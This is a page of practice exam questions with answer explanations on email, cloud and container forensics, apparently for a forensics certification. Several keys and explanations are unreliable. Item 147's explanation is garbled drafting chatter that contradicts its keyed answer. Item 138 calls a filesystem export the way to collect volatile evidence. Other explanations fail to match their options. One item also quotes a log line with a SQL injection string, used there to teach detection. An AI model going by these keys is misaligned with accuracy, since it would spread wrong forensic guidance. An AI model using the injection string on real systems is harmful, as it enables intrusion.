Which TWO of the following are valid indicators of email spoofing when analyzing email headers?

Select 2 answers
A.The 'From' header domain matches the 'Return-Path' domain
B.The 'DKIM-Signature' header validates successfully
C.The 'Received-SPF' header shows 'fail'
D.The 'Message-ID' header contains the sender's IP address
E.The 'Reply-To' header differs from the 'From' header
AnswersC, E

SPF fail indicates the sending server is not authorized to send for the domain.

Why this answer

SPF failure and a mismatch between Reply-To and From are common signs of spoofing.

138
MCQhard

A forensic analyst is examining a Docker container suspected of being used for malicious activities. The container was running an Alpine Linux image and was stopped 2 hours ago. Which of the following is the BEST first step to collect volatile evidence?

A.Collect the container's log files from /var/log/
B.Create a memory dump of the container's process
C.Export the container's filesystem using docker export
D.Run docker attach to reconnect to the container
AnswerC

docker export creates a tar archive of the container's filesystem, preserving persistent data.

Why this answer

When a container is stopped, its process state and other in-memory data are lost. The best first step is to create a forensic image of the container's filesystem layers, which are still available on the host. Docker containers' filesystems are stored as layers on the host, accessible via docker export or by copying the container's filesystem from /var/lib/docker/overlay2/.

139
MCQmedium

An email header contains the following line: "Received: from mail.evil.com (192.0.2.1) by mail.victim.com with ESMTP; Mon, 20 Mar 2023 10:00:00 -0500". The next Received line shows a different IP. What does this indicate?

A.The email is likely spoofed
B.The email's DKIM signature is invalid
C.The email was encrypted in transit
D.The email was forwarded from another server
AnswerA

The first Received header claims a source IP (192.0.2.1) that may not match the actual originating server, indicating spoofing.

Why this answer

Discrepancies in the Received headers, especially IP mismatches, are a classic sign of email spoofing where the origin is forged.

140
Multi-Selecteasy

Which TWO of the following are common challenges in cloud forensics that are not typically encountered in traditional on-premises forensics?

Select 2 answers
A.Difficulty in obtaining search warrants
B.Lack of forensic tools for cloud environments
C.Volatile evidence that may be lost on system shutdown
D.Multi-tenancy and co-mingling of data
E.Data jurisdiction and legal compliance across regions
AnswersD, E

Multiple tenants share the same physical infrastructure, complicating data isolation.

Why this answer

Multi-tenancy and data jurisdiction are unique to cloud environments. Volatile evidence is a general challenge but not exclusive to cloud. Lack of tools is not a typical challenge.

Legal warrants apply to both.

141
Multi-Selecthard

An Azure Activity Log shows a suspicious 'Delete Virtual Machine' operation from an IP address in a foreign country. Which THREE actions should the forensic investigator take immediately to preserve evidence and assess impact?

Select 3 answers
A.Check if the VM's disks have been copied or exported
B.Isolate the affected VM from the network
C.Export the Activity Log to a secure storage
D.Restore the VM from the latest backup
E.Immediately revoke all IAM permissions
AnswersA, B, C

Determine if data exfiltration occurred by checking disk exports.

Why this answer

Isolating the VM, exporting the Activity Log, and checking for data backups are critical steps to preserve evidence.

142
MCQmedium

A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?

A.AWS CloudTrail
B.VPC Flow Logs
C.Amazon S3 access logs
D.AWS Config
AnswerA

CloudTrail is the audit log for API activity in AWS.

Why this answer

AWS CloudTrail records all API calls made to the AWS environment, including S3 bucket deletions. It logs the identity, source IP, and request parameters.

143
Multi-Selectmedium

A security analyst is investigating a potential container escape from a Docker container. Which THREE artifacts should the analyst collect to analyze the incident? (Select THREE.)

Select 3 answers
A.Host system's audit logs (e.g., /var/log/auth.log)
B.Network traffic captures from the host's physical NIC
C.Container image layers from the registry
D.Container's memory dump
E.Docker daemon logs (e.g., journalctl -u docker)
AnswersA, C, E

Host logs may show unusual system calls or access from the container.

Why this answer

Host audit logs, Docker daemon logs, and container image layers are critical for investigating container escapes.

144
Multi-Selecthard

Which THREE of the following are challenges specific to container forensics?

Select 3 answers
A.Ephemeral nature of containers: containers are often short-lived and can be deleted quickly
B.Containers cannot be imaged using standard forensic tools
C.Container logs are always stored in a centralized location
D.Multiple layers in a container image require analysis of each layer for forensic artifacts
E.Containers share the host kernel, so kernel-level artifacts are not available
AnswersA, D, E

Containers are designed to be ephemeral, making forensic acquisition time-sensitive.

Why this answer

The ephemeral nature, layered file systems, and shared kernel are key challenges in container forensics.

145
MCQeasy

A security analyst is reviewing Apache access logs and finds the entry: 192.168.1.100 - - [10/Mar/2025:08:12:34 +0000] "GET /search?q=test' OR '1'='1 HTTP/1.1" 200 532. Which attack does this log entry most likely indicate?

A.Cross-site scripting (XSS)
B.Remote file inclusion (RFI)
C.SQL injection (SQLi)
D.Path traversal
AnswerC

The single quotes and OR '1'='1 are characteristic of SQLi.

Why this answer

The presence of ' OR '1'='1 in the query string is a classic SQL injection attempt, designed to bypass authentication or extract data.

146
MCQhard

A forensic analyst is investigating a Docker container that was used to launch a network attack. The container has been stopped but not removed. Which action should the analyst take FIRST to preserve volatile evidence?

A.Restart the container and use 'docker exec' to collect evidence
B.Use 'docker inspect' to view container metadata only
C.Use 'docker save' to export the container as a tar file
D.Use 'docker commit' to create an image of the container
AnswerD

This captures the current filesystem state without altering it.

Why this answer

Preserving the container's file system and logs is key. 'docker commit' creates an image from the container's current state. 'docker export' exports the filesystem as a tar archive. 'docker logs' retrieves logs. 'docker inspect' shows metadata. The container is stopped, so 'docker exec' won't work without starting it, which alters state. 'docker save' saves images, not containers. The best first step is to create an image or export the filesystem.

147
MCQmedium

An organization uses Azure. A security analyst needs to investigate a suspicious login event. Which Azure log contains details about user sign-ins, including IP address, timestamp, and success/failure status?

A.Azure Monitor Metrics
B.Azure AD Sign-in logs
C.Azure Activity Logs
D.Azure Security Center alerts
AnswerB

Azure AD Sign-in logs capture user authentication events with IP, timestamp, and status.

Why this answer

Azure Activity Logs (now also called Azure Monitor activity log) record subscription-level events, but user sign-in details are specifically in Azure AD Sign-in logs, which are part of Azure Active Directory reporting. However, the question asks about Azure logs; the most appropriate is Azure AD Sign-in logs, but since that's not an option, the closest is Azure Activity Logs which can capture management events, but not sign-ins. Actually, Azure AD Sign-in logs are the correct source.

But given options, if only Azure Activity Logs is present, it's partially correct. The typical answer is Azure AD Sign-in logs. Since the question says "Azure log", the best choice is Azure Activity Logs as it's within Azure Monitor, but it's not precise.

Let's adjust options accordingly. I'll assume Azure AD Sign-in logs is not listed; I'll create a plausible distractor. Actually, in real exam, they expect Azure AD Sign-in logs.

I'll make sure one option says "Azure AD Sign-in logs". But the stem says "Azure log", so I'll include it. Let me redo: The correct answer should be Azure AD Sign-in logs.

I'll set that as option A.

148
MCQeasy

Which cloud forensic challenge refers to the inability to physically access the storage media where data resides?

A.Data jurisdiction
B.Lack of physical access
C.Multi-tenancy
D.Volatility of evidence
AnswerB

In cloud forensics, investigators cannot physically seize servers.

Why this answer

Volatility of evidence relates to the ephemeral nature of cloud data. Multi-tenancy is about shared resources. Data jurisdiction is legal.

Lack of physical access is a key challenge.

149
MCQmedium

In cloud forensics, which AWS service provides a centralized log of API calls made by users and services, often used to investigate unauthorized access or configuration changes?

A.AWS CloudWatch
B.AWS CloudTrail
C.AWS Config
D.AWS VPC Flow Logs
AnswerB

CloudTrail records API activity for auditing and forensic analysis.

Why this answer

AWS CloudTrail records all API calls for governance, compliance, and operational auditing, making it essential for forensic investigations in AWS.

150
MCQmedium

During a cloud forensic investigation, an analyst needs to identify who deleted an S3 bucket in an AWS environment. Which AWS service log should the analyst examine to find the API call and the associated IAM user or role?

A.AWS CloudTrail
B.Amazon S3 server access logs
C.AWS Config
D.Amazon CloudWatch Logs
AnswerA

CloudTrail logs all API calls and is the primary source for tracking user activity.

Why this answer

AWS CloudTrail records API calls made to AWS services, including S3 bucket deletion, along with the identity of the caller.

← PreviousPage 2 of 3 · 155 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Chfi App Email Cloud questions.